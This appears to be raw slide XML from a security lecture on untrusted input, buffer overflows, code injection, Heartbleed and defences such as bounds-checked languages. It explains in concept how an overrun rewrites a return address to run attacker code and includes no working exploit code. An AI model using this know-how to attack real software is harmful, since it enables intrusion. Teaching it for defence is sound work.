              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>influence (“taint”) other data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that flows through my program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And could be stored in files, databases, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>How to ensure that untrusted inputs, no matter what they are, will produce benign results?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sanitization, checking, etc. as early as possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to do this depends on the program, and how the inputs are used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>123</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220255905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happened?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="tack construction during the function c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0186" y="2670125"/>
            <a:ext cx="12111975" cy="8830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964945" y="1524000"/>
            <a:ext cx="783868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b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="5000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>trcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="5000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>(buff, “</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="5000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="5000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>”);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 350"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="543127" y="2701167"/>
            <a:ext cx="11887200" cy="10475529"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>or C/C++ programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>A buffer with the password could be a local variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Therefore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>nput is too long</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>overruns the buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input includes machine instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>The overrun rewrites the return address to point into the buffer, at the machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>instructions</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>When the call “returns” it executes the attacker’s code </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16580890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25BBF9-6B46-A886-C632-0BF373AC48FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA713F5-7939-D193-9E1A-6459FC3FDB91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This exploitation of a buffer overflow is one example of code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It gets the application to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>treat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> attacker-provided data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> instructions (code) or code parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will see this in other attacks later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EDDB90B-A744-7141-6C56-0138BD48D30B}"/>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35832147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559385-7D31-0C19-CEB9-A828AD000227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="184152"/>
            <a:ext cx="20795674" cy="3016249"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="11200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Heartbleed: Buffer overread</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A4EC19F-9581-DCFE-CD84-3B8B2B5B95A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="5817814"/>
            <a:ext cx="10515600" cy="6536112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Heartbeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>: Server echoes back </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> bytes provided in the client packet, where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> is the given length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> (2014): Server trusts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>N </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &gt; actual packet size, server will read (“bleed”) and return its own memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Risk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>: Bled memory could contain secrets like cryptographic keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>And</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>: Easy to exploit the bug!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59CD5DB2-7CB7-8AA6-5F01-8490235D71B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12747298" y="6225991"/>
            <a:ext cx="9724776" cy="5161306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="Heartbleed Bug">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24445E63-A031-E8F1-B465-CC6E2F767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4522" y="6600105"/>
            <a:ext cx="3106156" cy="376200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B6CC1EE6-77EF-1063-36D2-812370E27044}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="3651250"/>
            <a:ext cx="21031200" cy="1923664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="182880" tIns="91440" rIns="182880" bIns="9144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600" dirty="0"/>
              <a:t>OpenSSL is a popular open-source cryptographic library, started in 1998, that implements the SSL and TLS protocols. Widely used.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{647249A8-4C2B-1F62-A28E-F281B5CD959D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11511228" y="11866266"/>
            <a:ext cx="12196916"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>heartbleed.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1490068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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2998381" y="625078"/>
            <a:ext cx="18054084" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Stopping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Shape 353"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3836020" y="3134320"/>
            <a:ext cx="16816039" cy="10249302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Buffer overflows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> rely on the ability to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>read </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> write outside the bounds </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>of a buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Helvetica"/>
              <a:ea typeface="Helvetica"/>
              <a:cs typeface="Helvetica"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>C and C++</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> programs expect the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>programmer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> to ensure this never happens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Essentially, a kind of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>input validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(much more later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>But humans (regularly) make mistakes!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Other languages (like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Rust</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>, Java</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Go</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> etc.) ensure buffer sizes are respected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>compiler</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> inserts checks at reads/writes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Such checks can halt the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>But will </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>prevent a bug from being exploited</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </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53">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353">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5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53">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>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353">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>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353">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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35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5" name="Shape 355"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3922359" y="8393568"/>
            <a:ext cx="3613142" cy="1270001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="635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56" name="Shape 356"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13238359" y="2999413"/>
            <a:ext cx="5407280" cy="1362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000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="47394"/>
                    <a:satOff val="-25753"/>
                    <a:lumOff val="-7544"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Instructions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Shape 357"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9248501" y="5253525"/>
            <a:ext cx="14903385" cy="6594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846666" indent="-846666" algn="l">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>print “Password?” to the screen</a:t>
            </a:r>
